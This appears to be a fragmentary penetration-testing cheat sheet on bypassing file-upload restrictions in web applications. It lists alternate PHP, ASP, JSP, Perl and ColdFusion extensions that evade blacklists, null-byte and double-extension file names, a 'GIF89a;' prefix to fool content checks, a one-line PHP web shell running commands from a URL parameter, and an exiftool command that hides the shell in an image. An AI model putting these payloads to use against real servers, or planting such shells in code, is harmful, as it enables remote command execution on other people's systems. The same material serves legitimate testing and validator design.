Rename it
upload it as shell.php.jpg
Blacklisting bypass, change extension
php phtml, .php, .php3, .php4, .php5, and .inc
bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6
pht, phpt, phtml, php3, php4, php5, php6
asp asp, .aspx
asp, .aspx
perl .pl, .pm, .cgi, .lib
.pl, .pm, .cgi, .lib
jsp .jsp, .jspx, .jsw, .jsv, and .jspf
.jsp, .jspx, .jsw, .jsv, and .jspf
Coldfusion .cfm, .cfml, .cfc, .dbm
.cfm, .cfml, .cfc, .dbm
Whitelisting bypass
Bypassed by uploading a file with some type of tricks,
Like adding a null byte injection like (shell.php%00.gif ).
shell.php%00.gif
Or by using double extensions for the uploaded file like ( shell.jpg.php)
shell.jpg.php
GIF89a;
If they check the content. Basically you just add the text "GIF89a;" before you shell-code.
Copy
GIF89a; <? system($_GET['cmd']);//or you can insert your complete shell code ?>
Last updated 1 year ago
1. <?php system($_GET['cmd']); ?> //shell.php 2. exiftool "-comment<=shell.php" malicious.png 3. strings malicious.png | grep system
